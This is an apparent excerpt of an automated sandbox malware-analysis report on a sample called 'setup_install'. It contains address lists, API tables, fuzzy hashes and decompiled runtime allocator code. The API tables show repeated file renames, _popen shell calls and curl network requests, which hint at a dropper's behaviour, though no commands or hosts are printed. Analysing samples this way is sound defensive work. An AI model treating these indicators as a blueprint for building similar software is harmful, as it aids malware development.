0x00401405
0x0040140c
0x00401413
0x0040141d
0x00401423
0x00401423
0x00401423
0x0040141d
0x004013f7
0x00000000
0x004013b2
0x004013bd
0x00000000
0x0040119b
0x0040119b
0x004011a2
0x004011a4
0x00000000
0x004011a4
0x004011f2
0x004011f2
0x004011f9
0x004011fb
0x00401203
0x0040120b
0x00401212
0x00401214
0x00401214
0x00401217
0x0040121c
0x00401223
0x0040122c
0x00401231
0x0040123d
0x00401242
0x0040124c
0x00401251
0x00401253
0x00401257
0x00401271
0x00401271
0x00401271
0x00401277
0x00000000
0x00000000
0x00401279
0x00401281
0x0040126e
0x0040126e
0x00401271
0x00401271
0x00401277
0x00000000
0x00000000
0x004012af
0x004012af
0x00000000
0x00401260
0x00401262
0x00401269
0x00401269
0x00000000
0x00401269
0x00401290
0x00401292
0x004012a5
0x004012a5
0x004012a5
0x004012a8
0x004012ad
0x00000000
0x00000000
0x004012a0
0x004012a3
0x00000000
0x00000000
0x00000000
0x004012a3
0x004012a5
0x00000000
0x00401292
0x00401271
0x004012b4
0x004012b4
0x004012bc
0x004012c2
0x004012c7
0x004013c0
0x004013c0
0x004012cd
0x004012cd
0x004012d2
0x004012d8
0x004012e2
0x004012e9
0x004012ec
0x004012f2
0x00401464
0x00401464
0x004012f8
0x004012f8
0x004012f8
0x004012fa
0x004012fa
0x004012fd
0x004012ff
0x00401304
0x00401310
0x00401310
0x00401310
0x00401312
0x00401315
0x00401320
0x00401320
0x00401326
0x0040132b
0x0040133c
0x00401341
0x00401349
0x00401349
0x0040134c
0x0040134c
0x00401355
0x0040135a
0x0040135f
0x00401364
0x0040136a
0x0040136c
0x00401371
0x00401375
0x0040137a
0x0040137e
0x00401383
0x00401386
0x0040138b
0x00401391
0x00401398
0x0040146c
0x0040146f
0x00401483
0x0040148d
0x00000000
0x00401492
0x0040139e
0x0040139e
0x004013a6
0x004013a8
0x004013ad
0x004013ad
0x00000000
0x004013a6
0x004011b5
0x004011b5
0x004011ba
0x004011bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004011bf

APIs

Sleep.KERNEL32 ref: 004011A2
SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
__p__acmdln.MSVCRT ref: 0040124C
malloc.MSVCRT ref: 004012E2
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
GetStartupInfoA.KERNEL32 ref: 00401433

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: eef61733564d8656d96dd37d656dec010b55c0c6ea897d65d40b674871a19b06
Instruction ID: 58371ba24f8e5a2074276eded49b5cdda8a4e44816ae7e234cb84dfdcbaee605
Opcode Fuzzy Hash: eef61733564d8656d96dd37d656dec010b55c0c6ea897d65d40b674871a19b06
Instruction Fuzzy Hash: 11516A70A04350CFDB10DF69D9C065AB7E0FB58358F15453EE944AB3A2D778A844CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040165F, Relevance: 35.1, APIs: 23, Instructions: 597
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowA.USER32 ref: 0040168E

Part of subcall function 00485620: strlen.MSVCRT ref: 0048563C

rename.MSVCRT ref: 00401905
rename.MSVCRT ref: 00401919
rename.MSVCRT ref: 0040192D
rename.MSVCRT ref: 00401941
rename.MSVCRT ref: 00401955
rename.MSVCRT ref: 00401969
rename.MSVCRT ref: 0040197D
rename.MSVCRT ref: 00401991
rename.MSVCRT ref: 004019A5
rename.MSVCRT ref: 004019B9
_popen.MSVCRT ref: 004019DB
_popen.MSVCRT ref: 00401A7D
_popen.MSVCRT ref: 00401B06
_popen.MSVCRT ref: 00401B8F
_popen.MSVCRT ref: 00401C18
_popen.MSVCRT ref: 00401CA1
_popen.MSVCRT ref: 00401D2A
_popen.MSVCRT ref: 00401DB3
_ZN6curlpp7CleanupC2Ev.LIBCURLPP ref: 00401FB6
_ZN6curlpp4Easy7performEv.LIBCURLPP ref: 00401FE0
_ZN6curlpp4Easy7performEv.LIBCURLPP ref: 00402024
_ZN6curlpp7CleanupD2Ev.LIBCURLPP ref: 00402036

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: rename$_popen$CleanupEasy7performN6curlpp4N6curlpp7$FindWindowstrlen
String ID:
API String ID: 3730204873-0
Opcode ID: 320e9e53428a306b7d58d125d175def637e8485c2208cd8633ce9dd44bba5d57
Instruction ID: c947d17241341858e50c1cc2f7e64abd6890e53cc51a40ed09206bc1d4c6ce0a
Opcode Fuzzy Hash: 320e9e53428a306b7d58d125d175def637e8485c2208cd8633ce9dd44bba5d57
Instruction Fuzzy Hash: DF421D749043188BCB00FF75D89569DBBF5AF84348F4088BED889D7351EB389A888F59

Uniqueness

Uniqueness Score: -1.00%

Function 00401299, Relevance: 7.6, APIs: 5, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 004012E2
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
_cexit.MSVCRT ref: 004013A8

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: malloc$_cexitmemcpystrlen
String ID:
API String ID: 701060287-0
Opcode ID: 8616c1fc610afe376f53801ff49a261a96614163d3931b24e3ef9e4b756175c4
Instruction ID: 1eeec1ca7e2ee60c8e74640e0eb5094eb1b6b07a2056bb0096e7b3557f0cb923
Opcode Fuzzy Hash: 8616c1fc610afe376f53801ff49a261a96614163d3931b24e3ef9e4b756175c4
Instruction Fuzzy Hash: 283166B1A00355CFDB10DF69D8C0689B7E1FB58358F15853ED948AB362E738A944CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00401289, Relevance: 7.6, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 004012E2
strlen.MSVCRT ref: 0040131B
malloc.MSVCRT ref: 00401326
memcpy.MSVCRT ref: 0040133C
_cexit.MSVCRT ref: 004013A8

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: malloc$_cexitmemcpystrlen
String ID:
API String ID: 701060287-0
Opcode ID: 46ffb04620b03b817220887c754f3648ed9fdd1b2f4a383701e3abc732d084ef
Instruction ID: da99a9dd7a9652e277cdf99e8ad8147c78263645af53058d599a1607fe1598c0
Opcode Fuzzy Hash: 46ffb04620b03b817220887c754f3648ed9fdd1b2f4a383701e3abc732d084ef
Instruction Fuzzy Hash: B53124B4A00355CFDB10DF69D8C0689B7E1FB58358F16853ED948AB362E738A944CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0041C940, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E0041C940(signed int* __eax, signed int* __ebx, signed int __edi, void* __esi, void* __ebp) {
				signed int* _v32;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int* _t33;
				signed int* _t34;
				void* _t35;
				signed int* _t39;
				signed int* _t42;
				signed int* _t43;
				signed int _t46;
				signed int _t47;
				signed int _t52;
				signed int* _t53;
				signed int* _t55;
				signed int _t57;
				signed int* _t62;
				void* _t65;
				signed int** _t69;
				void* _t70;
				signed int** _t71;
				signed int** _t72;
				void* _t77;

				_t57 = __edi;
				_t42 = __ebx;
				_t33 = __eax;
				_push(__edi);
				_t62 = __eax;
				_push(__ebx);
				_t71 = _t70 - 0x2c;
				 *_t71 = 0x49f2dc;
				L0041B758();
				if(__eax != 0) {
					L22:
					_t34 = E0041E8A0(_t33);
					goto 0x497190;
					0;
					0;
					_push(_t57);
					_push(_t62);
					_push(_t42);
					_t43 = _t34;
					_t72 = _t71 - 0x10;
					 *_t72 = 0x49f2dc;
					L0041B758();
					__eflags = _t34;
					if(_t34 != 0) {
						L40:
						_t35 = E0041E8A0(_t34);
						goto 0x4971a4;
						0;
						0;
						 *0x49fe80 = 0xffffffff;
						_t55 - 0x49 = _t43 + _t35 + 0x49fea4;
					} else {
						_t34 =  &(_t43[4]);
						_t55 =  *0x49f2e0; // 0x2710048
						__eflags = _t34 - 8;
						_t50 =  >=  ? _t34 : 8;
						_t51 = ( >=  ? _t34 : 8) + 0xf;
						_t52 = ( >=  ? _t34 : 8) + 0x0000000f & 0xfffffff0;
						__eflags = _t55;
						if(_t55 == 0) {
							L30:
							_t43 = 0;
							__eflags = 0;
						} else {
							_t46 =  *_t55;
							__eflags = 8 - _t46;
							if(8 > _t46) {
								while(1) {
									_t34 = _t55[1];
									__eflags = _t34;
									if(_t34 == 0) {
										goto L30;
									}
									_t46 =  *_t34;
									__eflags = _t52 - _t46;
									if(_t52 <= _t46) {
										_t55 =  &(_t55[1]);
										__eflags = _t55;
										goto L34;
									} else {
										_t55 = _t34;
										continue;
									}
									goto L31;
								}
								goto L30;
							} else {
								_t34 = _t55;
								_t55 = 0x49f2e0;
								L34:
								_t57 = _t34[1];
								_t65 = _t46 - _t52;
								__eflags = _t65 - 7;
								if(_t65 <= 7) {
									 *_t34 = _t46;
									 *_t55 = _t57;
								} else {
									_t47 = _t34 + _t52;
									 *(4 + _t47) = _t57;
									_t34 =  *_t55;
									 *_t47 = _t65;
									 *_t34 = _t52;
									 *_t55 = _t47;
								}
								_t43 =  &(_t34[4]);
							}
						}
						L31:
						 *_t72 = 0x49f2dc;
						L0041B750();
						__eflags = _t34;
						if(__eflags != 0) {
							 *_t72 = 4;
							0x496230();
							 *_t34 = 0x4a9558;
							_v80 = 0x41e660;
							_v84 = 0x4a5fec;
							 *_t72 = _t34;
							0x496920();
							goto L40;
						} else {
							return;
						}
					}
				} else {
					_t55 =  *0x49f2e0; // 0x2710048
					_t57 = __eax - 0x10;
					if(_t55 == 0) {
						L13:
						 *(_t62 - 0xc) = _t55;
						 *0x49f2e0 = _t57;
					} else {
						_t33 =  *(__eax - 0x10);
						_t42 = _t33 + _t57;
						_v32 = _t33;
						_t77 = _t55 - _t42;
						if(_t77 > 0) {
							goto L13;
						} else {
							_t53 = _t55[1];
							if(_t77 == 0) {
								_t33 = _v32 +  *_t55;
								 *(__eax - 0xc) = _t53;
								 *(__eax - 0x10) = _t33;
								 *0x49f2e0 = _t57;
							} else {
								if(_t53 == 0) {
									_t39 = 0;
									_t53 = _t55;
									_t69 = 0x49f2e0;
								} else {
									if(_t42 < _t53) {
										while(1) {
											_t39 = _t53[1];
											_t7 =  &(_t55[1]); // 0x271004c
											_t69 = _t7;
											__eflags = _t39;
											if(__eflags == 0) {
												goto L10;
											}
											_t55 = _t53;
											__eflags = _t42 - _t39;
											if(__eflags < 0) {
												_t53 = _t39;
												continue;
											}
											goto L10;
										}
									} else {
										_t39 = _t53;
										_t69 = 0x49f2e0;
										_t53 = _t55;
									}
								}
								L10:
								if(_t42 == _t39) {
									_v32 = _v32 +  *_t42;
									_t53[1] = _t42[1];
								}
								_t33 =  *_t69;
								_t55 =  *_t33;
								if(_t57 == _t33 + _t55) {
									_t55 = _t55 + _v32;
									 *_t33 = _t55;
								} else {
									_t42 = _v32;
									 *(_t62 - 0xc) = _t33[1];
									_t33 =  *_t69;
									 *(_t62 - 0x10) = _t42;
									_t33[1] = _t57;
								}
							}
						}
					}
					 *_t71 = 0x49f2dc;
					L0041B750();
					if(_t33 != 0) {
						 *_t71 = 4;
						0x496230();
						 *_t33 = 0x4a9558;
						_v52 = 0x41e660;
						_v56 = 0x4a5fec;
						 *_t71 = _t33;
						0x496920();
						goto L22;
					} else {
						return;
					}
				}
			}

0x0041c940
0x0041c940
0x0041c940
0x0041c941
0x0041c943
0x0041c945
0x0041c946
0x0041c949
0x0041c950
0x0041c957
0x0041ca6a
0x0041ca6a
0x0041ca6f
0x0041ca7a
0x0041ca7e
0x0041ca80
0x0041ca81
0x0041ca82
0x0041ca83
0x0041ca85
0x0041ca88
0x0041ca8f
0x0041ca94
0x0041ca96
0x0041cb4b
0x0041cb4b
0x0041cb50
0x0041cb5b
0x0041cb5f
0x0041cb60
0x0041cb73
0x0041ca9c
0x0041ca9c
0x0041caa4
0x0041caaa
0x0041caad
0x0041cab0
0x0041cab3
0x0041cab6
0x0041cab8
0x0041cad1
0x0041cad1
0x0041cad1
0x0041caba
0x0041caba
0x0041cabc
0x0041cabe
0x0041caca
0x0041caca
0x0041cacd
0x0041cacf
0x00000000
0x00000000
0x0041cac2
0x0041cac4
0x0041cac6
0x0041caf0
0x0041caf0
0x00000000
0x0041cac8
0x0041cac8
0x00000000
0x0041cac8
0x00000000
0x0041cac6
0x00000000
0x0041cac0
0x0041cb18
0x0041cb1a
0x0041caf3
0x0041caf5
0x0041caf8
0x0041cafa
0x0041cafd
0x0041cb12
0x0041cb14
0x0041caff
0x0041caff
0x0041cb02
0x0041cb05
0x0041cb07
0x0041cb09
0x0041cb0b
0x0041cb0b
0x0041cb0d
0x0041cb0d
0x0041cabe
0x0041cad3
0x0041cad3
0x0041cada
0x0041cadf
0x0041cae1
0x0041cb21
0x0041cb28
0x0041cb2d
0x0041cb33
0x0041cb3b
0x0041cb43
0x0041cb46
0x00000000
0x0041cae3
0x0041caeb
0x0041caeb
0x0041cae1
0x0041c95d
0x0041c95d
0x0041c963
0x0041c968
0x0041c9d0
0x0041c9d0
0x0041c9d3
0x0041c96a
0x0041c96a
0x0041c96d
0x0041c970
0x0041c974
0x0041c976
0x00000000
0x0041c978
0x0041c978
0x0041c97b
0x0041ca14
0x0041ca16
0x0041ca19
0x0041ca1c
0x0041c981
0x0041c983
0x0041ca24
0x0041ca26
0x0041ca28
0x0041c989
0x0041c98b
0x0041c99a
0x0041c99a
0x0041c99d
0x0041c99d
0x0041c9a0
0x0041c9a2
0x00000000
0x00000000
0x0041c992
0x0041c994
0x0041c996
0x0041c998
0x00000000
0x0041c998
0x00000000
0x0041c996
0x0041c98d
0x0041ca32
0x0041ca34
0x0041ca39
0x0041ca39
0x0041c98b
0x0041c9a4
0x0041c9a6
0x0041ca05
0x0041ca09
0x0041ca09
0x0041c9a8
0x0041c9ab
0x0041c9b2
0x0041c9f1
0x0041c9f5
0x0041c9b4
0x0041c9b7
0x0041c9bb
0x0041c9be
0x0041c9c1
0x0041c9c4
0x0041c9c4
0x0041c9b2
0x0041c97b
0x0041c976
0x0041c9d9
0x0041c9e0
0x0041c9e7
0x0041ca40
0x0041ca47
0x0041ca4c
0x0041ca52
0x0041ca5a
0x0041ca62
0x0041ca65
0x00000000
0x0041c9e9
0x0041c9f0
0x0041c9f0
0x0041c9e7

APIs

malloc.MSVCRT ref: 004971E8

Strings

_J, xrefs: 0041CA5A

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: malloc
String ID: _J
API String ID: 2803490479-1327201673
Opcode ID: f3c39f958f64b984c8030204a96f0ab038128169e6aa4cee595da19e797bc046
Instruction ID: 9ceb686839d6f170ab43512f8789fde08e58eb0bdbb8e3dfe4d61d171e0dfe19
Opcode Fuzzy Hash: f3c39f958f64b984c8030204a96f0ab038128169e6aa4cee595da19e797bc046
Instruction Fuzzy Hash: 8941B2B46542058FCB10EF25D88066ABBE1FF95384F15C57FD489CB301E77988858B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0041CA80, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0041CA80(signed int* __eax, void* __ebx, signed int __edi, void* __esi) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _t16;
				signed int* _t17;
				signed int _t21;
				signed int* _t22;
				signed int _t23;
				signed int _t27;
				void* _t28;
				signed int** _t29;

				_t23 = __edi;
				_t9 = __eax;
				_t29 = _t28 - 0x10;
				 *_t29 = 0x49f2dc;
				L0041B758();
				if(__eax != 0) {
					L17:
					E0041E8A0(_t9);
					goto 0x4971a4;
					0;
					0;
					 *0x49fe80 = 0xffffffff;
				} else {
					_t9 =  &(__eax[4]);
					_t22 =  *0x49f2e0; // 0x2710048
					_t19 =  >=  ? _t9 : 8;
					_t20 = ( >=  ? _t9 : 8) + 0xf;
					_t21 = ( >=  ? _t9 : 8) + 0x0000000f & 0xfffffff0;
					if(_t22 != 0) {
						_t16 =  *_t22;
						if(8 > _t16) {
							while(1) {
								_t9 = _t22[1];
								if(_t9 == 0) {
									goto L7;
								}
								_t16 =  *_t9;
								if(_t21 <= _t16) {
									_t22 =  &(_t22[1]);
									goto L11;
								} else {
									_t22 = _t9;
									continue;
								}
								goto L8;
							}
							goto L7;
						} else {
							_t9 = _t22;
							_t22 = 0x49f2e0;
							L11:
							_t23 = _t9[1];
							_t27 = _t16 - _t21;
							if(_t27 <= 7) {
								 *_t9 = _t16;
								 *_t22 = _t23;
							} else {
								_t17 = _t9 + _t21;
								_t17[1] = _t23;
								_t9 =  *_t22;
								 *_t17 = _t27;
								 *_t9 = _t21;
								 *_t22 = _t17;
							}
						}
					}
					L8:
					 *_t29 = 0x49f2dc;
					L0041B750();
					if(_t9 != 0) {
						 *_t29 = 4;
						0x496230();
						 *_t9 = 0x4a9558;
						_v20 = 0x41e660;
						_v24 = 0x4a5fec;
						 *_t29 = _t9;
						0x496920();
						goto L17;
					} else {
						return;
					}
				}
			}

0x0041ca80
0x0041ca80
0x0041ca85
0x0041ca88
0x0041ca8f
0x0041ca96
0x0041cb4b
0x0041cb4b
0x0041cb50
0x0041cb5b
0x0041cb5f
0x0041cb60
0x0041ca9c
0x0041ca9c
0x0041caa4
0x0041caad
0x0041cab0
0x0041cab3
0x0041cab8
0x0041caba
0x0041cabe
0x0041caca
0x0041caca
0x0041cacf
0x00000000
0x00000000
0x0041cac2
0x0041cac6
0x0041caf0
0x00000000
0x0041cac8
0x0041cac8
0x00000000
0x0041cac8
0x00000000
0x0041cac6
0x00000000
0x0041cac0
0x0041cb18
0x0041cb1a
0x0041caf3
0x0041caf5
0x0041caf8
0x0041cafd
0x0041cb12
0x0041cb14
0x0041caff
0x0041caff
0x0041cb02
0x0041cb05
0x0041cb07
0x0041cb09
0x0041cb0b
0x0041cb0b
0x0041cb0d
0x0041cabe
0x0041cad3
0x0041cad3
0x0041cada
0x0041cae1
0x0041cb21
0x0041cb28
0x0041cb2d
0x0041cb33
0x0041cb3b
0x0041cb43
0x0041cb46
0x00000000
0x0041cae3
0x0041caeb
0x0041caeb
0x0041cae1

APIs

malloc.MSVCRT ref: 004971E8

Part of subcall function 00496230: malloc.MSVCRT ref: 0049623E

Strings

_J, xrefs: 0041CB3B

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: malloc
String ID: _J
API String ID: 2803490479-1327201673
Opcode ID: aacc61b4fd0c10ee95de0e35b65d682c770c63e55296917c82367f4314d569da
Instruction ID: 185e6595c66e8cd8296a4aa0789a4f711df089401b8e1016a8ab166a19a06e93
Opcode Fuzzy Hash: aacc61b4fd0c10ee95de0e35b65d682c770c63e55296917c82367f4314d569da
Instruction Fuzzy Hash: 7B319AB46482008FD700AF69D88176ABBE0FF55384F5585BFE545CB351E3BD88888B9E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00498C10, Relevance: 27.0, APIs: 18, Instructions: 44
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00498C3F
vfprintf.MSVCRT ref: 00498C5F
abort.MSVCRT ref: 00498C64
abort.MSVCRT ref: 00498C6C
abort.MSVCRT ref: 00498C71
abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort$fwritevfprintf
String ID:
API String ID: 2868300786-0
Opcode ID: b6d01eb28d5f15b32517d7324d90a9646e9376393ceb81c136301fc99bdd63f0
Instruction ID: b1ae646d97a572ca8dfcb4cad1bf5ee996ccb1def2ecd1f84809e5752382552e
Opcode Fuzzy Hash: b6d01eb28d5f15b32517d7324d90a9646e9376393ceb81c136301fc99bdd63f0
Instruction Fuzzy Hash: 64F062B08093095AD300BF65C1862BEF6F5EF4574CF51981EF0C457152D77C85859B9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040E840, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040E840(void* __eax, void* __edx) {
				intOrPtr _t79;
				void* _t81;
				void* _t86;
				void* _t89;
				intOrPtr _t90;
				signed int _t96;
				signed int _t98;
				void* _t100;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				intOrPtr* _t110;
				signed int _t113;
				signed int _t118;
				signed int _t120;
				void* _t124;
				void* _t129;
				char _t130;
				signed int _t131;
				void* _t132;
				signed int _t133;
				void* _t134;
				void* _t135;
				intOrPtr* _t136;
				intOrPtr* _t138;

				_t132 = __edx;
				_t129 = __eax;
				_t135 = _t134 - 0xbc;
				 *((intOrPtr*)(_t135 + 0x18)) = __eax;
				memcpy(_t135 + 0x30, __eax, 0x20 << 2);
				_t136 = _t135 + 0xc;
				_t124 = _t129 + 0x40;
				_t113 =  *(_t136 + 0x90);
				if((_t113 & 0x40000000) == 0 ||  *((char*)(_t136 + 0xa0)) == 0) {
					if( *((intOrPtr*)(_t136 + 0x40)) == 0) {
						if ( *0x4e64dc != 4) goto 0x498c7b;
						 *((intOrPtr*)(_t136 + 0x2c)) =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x18)) + 0x48));
						if((_t113 & 0x40000000) != 0) {
							 *((char*)(_t136 + 0xa0)) = 0;
						}
						 *((intOrPtr*)(_t136 + 0x40)) = _t136 + 0x2c;
					}
				}
				_t79 =  *((intOrPtr*)(_t136 + 0x18));
				if(( *(_t79 + 0x63) & 0x00000040) != 0) {
					 *((char*)(_t79 + 0x70)) = 0;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x18)) + 0x10)) = 0;
				_t81 =  *(_t132 + 0xa0);
				if(_t81 != 1) {
					if(_t81 != 2) {
						abort();
						_push(_t132);
						_t133 = _t113;
						_push(_t124);
						_push(_t129);
						_t130 = 0;
						_t100 = _t81;
						memset(_t100, 0, 0x20 << 2);
						_t138 = _t136 - 0xec + 0xc;
						 *((intOrPtr*)(_t100 + 0x60)) = 0x40000000;
						 *((intOrPtr*)(_t100 + 0x4c)) =  *((intOrPtr*)(_t138 + 0xfc));
						_t86 = E0040DBA0(_t100, _t138 + 0x20);
						if (_t86 != 0) goto 0x498c80;
						 *((intOrPtr*)(_t138 + 4)) = 0x40db20;
						 *_t138 = 0x4e64d4;
						L0041B748();
						if(_t86 != 0) {
							if( *0x4e64d8 == 0) {
								 *0x4e64d8 = 4;
								 *0x4e64da = 4;
								 *0x4e64d9 = 4;
								 *0x4e64db = 4;
								 *0x4e64de = 4;
								 *0x4e64df = 4;
								 *0x4e64dd = 4;
								 *0x4e64dc = 4;
								 *0x4e64e3 = 0xc;
								 *0x4e64e4 = 0xc;
								 *0x4e64e5 = 0xc;
								 *0x4e64e6 = 0xc;
								 *0x4e64e7 = 0xc;
								 *0x4e64e8 = 0xc;
								 *0x4e64e1 = 4;
								 *0x4e64e0 = 4;
							}
						}
